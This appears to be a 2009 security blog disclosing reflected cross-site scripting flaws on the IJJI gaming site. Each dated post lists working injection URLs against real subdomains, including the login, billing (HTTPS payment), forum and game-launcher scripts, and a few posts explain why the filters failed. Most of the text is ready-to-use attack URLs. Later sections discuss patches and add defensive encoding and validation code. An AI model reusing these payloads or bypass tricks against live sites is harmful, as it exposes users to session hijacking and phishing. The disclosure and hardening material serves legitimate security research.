One Month Later..

15 September 2009

It’s been a month since I published my last vulnerability, and IJJI has made several positive changes to their code (specifically with callback scripts).

The following posts have been patched by correctly encoding brackets and quotes, or by blacklisting non-alphanumeric characters:

The following post has been patched thanks to the use of the isNaN function over eval:

The following posts have been updated:

Updated the src attribute to call the event onError in Firefox 3.5.

Updated without the use of quotes.

IJJI has now published Holybeast Online and has begun the open beta for Soul of the Ultimate Nation (S.U.N). They’ve also pushed their new launcher, Reactor, an extended web-wrapper for organising installed games. Steam anyone?

I’ve updated the categories for now, but I shall expect them to be outdated as this blog becomes forgotten about.

Oh, one last thing: Pre-Game Start ;)


Global Pre-Download [BONUS2]

15 August 2009

Type: Non-persistent
Criteria: None

This final disclosure draws the series of predownload.nhn vulnerabilities to a close.

An actual explanation is due at a later date, when I will wrap this blog up and open it to feedback.

10) Miscellaneous

http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

11) Bulletin Board System

http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

12) Channel

http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

13) Billing

http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

14) HTTPS Billing

https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

15) Facebook

http://facebook.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

16) Message

http://message.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

17) Avatar

http://avatar.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return


Global Pre-Download [BONUS]

14 August 2009

Type: Non-persistent
Criteria: None

The penultimate post in this experimental blog, disclosing 9 separate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.

1) Top-level

http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

2) www2

http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

3) Huxley:The Dystopia

http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

4) Soldier Front

http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

5) GunZ

http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

6) Drift City

http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

7) Lunia

http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

8) Game

http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

9) Events

http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

This script has an advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.


Global Pre-Launch [BONUS2]

13 August 2009

Type: Non-persistent
Criteria: None

This post is a continuation of the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script.

10) Miscellaneous

http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

11) Bulletin Board System

http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

12) Channel

http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

13) Billing

http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

14) HTTPS Billing

https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

15) Facebook

http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

16) Message

http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

17) Avatar

http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:

If the user is authenticated, they will be alerted:

This channel does not exist

If the user is not authenticated, then they will be redirected to login (there is a timed delay with Firefox).


Global Pre-Launch [BONUS]

12 August 2009

Type: Non-persistent
Criteria: None

Thus begins the final 4 days of this experiment; hopefully ending with a bang.

This post will disclose 9 separate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.

1) Top-level

http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

2) www2

http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

3) Huxley:The Dystopia

http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

4) Soldier Front

http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

5) GunZ

http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

6) Drift City

http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

7) Lunia

http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

8) Game

http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

9) Events

http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

They clearly all exploit the same parameter, as they share the same script. I plan to write up better descriptions in a separate post.


Login Next URL

11 August 2009

Type: Non-persistent
Criteria: None

http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);//

There are no criteria, as you can be logged in or not – though if you are, you will be logged out (naturally).

In a nutshell, double quotes are encoded but single ones are not – and the nextURL parameter is carelessly output straight into a script tag (for the loginENMLoginForm function).


Game Screenshot

10 August 2009

Type: Non-persistent
Criteria: None

http://game.ijji.com/sshot.nhn?gameId=u_gunz&index=0);alert(/xss/.source

A fairly old method, updated so that no single or double quotes are needed for the “xss” string (quotes are now correctly encoded before output). The index variable still doesn’t strip anything that doesn’t resemble an integer.


Blog Status

10 August 2009

I started this blog as an experiment, and as a small sideline challenge (to discover a vulnerability on the IJJI site every day for a month), but as I look back, I seem to have made numerous errors.

Each post should be focusing on a different script. My early posts focused on polls, which all used the same script:

http://event.ijji.com/poll.nhn

The only difference in each disclosure was the poll name, which did return different data, but they shouldn’t have been posted separately, as it wasn’t a new script.

Scripts on different subdomains are allowed though, as subdomains are seen as different hostnames according to the same-origin policy (which is important for an attack).


BBS Forum View

9 August 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&page=&id=999999999&ordering=%22;alert(%27xss%27);//

Note that the exploit will execute twice.

Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the id variable is now very picky about what data has been supplied. However, this exploit will still accept an id which doesn’t yet exist (less data is returned when it doesn’t exist, but the exploit works with or without a valid id variable).

The XSS relies on the value of ordering, which is blindly printed into the main page, and in both instances directly into a SCRIPT tag (the phrase “script” has been blacklisted from all scripts, which is why I’ve been using an alternative).
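As an added example (not IJJI's code), this is the shape of the fixes the "One Month Later" post describes, applied to the script-context parameters seen in the posx, subId, nextURL, index and ordering posts: a numeric check that emits the parsed number instead of the raw text, and a JS string literal encoder for string values. The init() template and the parameter handling are assumptions for the example; only the parameter names come from the posts.

```javascript
// Added example, not IJJI's code. The template is an assumption; the
// parameter names (posx, subId) are the ones the disclosures use.

// Vulnerable pattern: the raw query value is pasted into script source, so a
// value such as "0;}alert(1);function init(){return" rewrites the function.
function renderInitScriptUnsafe(params) {
  return "<script>function init(){ var posx=" + params.posx + "; }</script>";
}

// Numeric parameters (posx, index): parse, reject NaN and non-integers, and
// emit the parsed number, never the original text (the isNaN-style fix).
function asInteger(value, fallback) {
  if (typeof value !== "string" || value.trim() === "") return fallback;
  const n = Number(value);          // "0;}alert(...)" -> NaN
  return Number.isInteger(n) ? n : fallback;
}

// String parameters (subId, nextURL, ordering): emit a JSON string literal so
// quotes and backslashes are escaped, and escape "<" so "</script>" and
// "<!--" cannot close the script block. U+2028/2029 are JS line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened template: every value reaches the script through one of the two
// helpers above, so a query parameter can no longer change the script's shape.
function renderInitScript(params) {
  const posx = asInteger(params.posx, 0);
  const subId = jsStringLiteral(params.subId === undefined ? "" : params.subId);
  return "<script>function init(){ var posx=" + posx +
         "; var subId=" + subId + "; }</script>";
}
```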


HTTPS Add G Coin

8 August 2009

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22

Another vulnerability from the paymentprocess.nhn script. The RURL (referral URL) variable doesn’t check whether the address supplied is valid or strip any characters. A particularly lazy example.

It is output into a hidden input tag (REQ_RURL), so there are no visible changes for the end user.
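As an added example (not IJJI's code), here is how a return URL such as RURL can be validated against an allow-list and then encoded for the attribute context before it is written into the hidden REQ_RURL input. The allowed hosts and the base URL are assumptions for this example.

```javascript
// Added example, not IJJI's code. ALLOWED_HOSTS and BASE_URL are assumptions.
const ALLOWED_HOSTS = new Set(["www.ijji.com", "billing.ijji.com"]);
const BASE_URL = "https://billing.ijji.com/";

// Encode a value for a double-quoted HTML attribute.
function htmlAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Resolve RURL against the site, then accept it only if it is an http(s) URL
// on an allowed host. Returns the canonical serialization (never the raw
// input) or null. This also rejects javascript: URLs and protocol-relative
// "//other.host/" values, which a plain prefix check would let through.
function validateReturnUrl(raw) {
  if (typeof raw !== "string" || raw.length > 2048) return null;
  let url;
  try {
    url = new URL(raw, BASE_URL);
  } catch (e) {
    return null;
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Render the hidden field; invalid values fall back to the site root.
function renderHiddenRurl(raw) {
  const safe = validateReturnUrl(raw) || "/";
  return '<input type="hidden" name="REQ_RURL" value="' + htmlAttr(safe) + '">';
}
```

A value that survives validation is the WHATWG-serialised URL, so stray quotes and brackets are already percent-encoded before htmlAttr runs; the encoder is still applied so the attribute stays well-formed whatever the validator returns.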

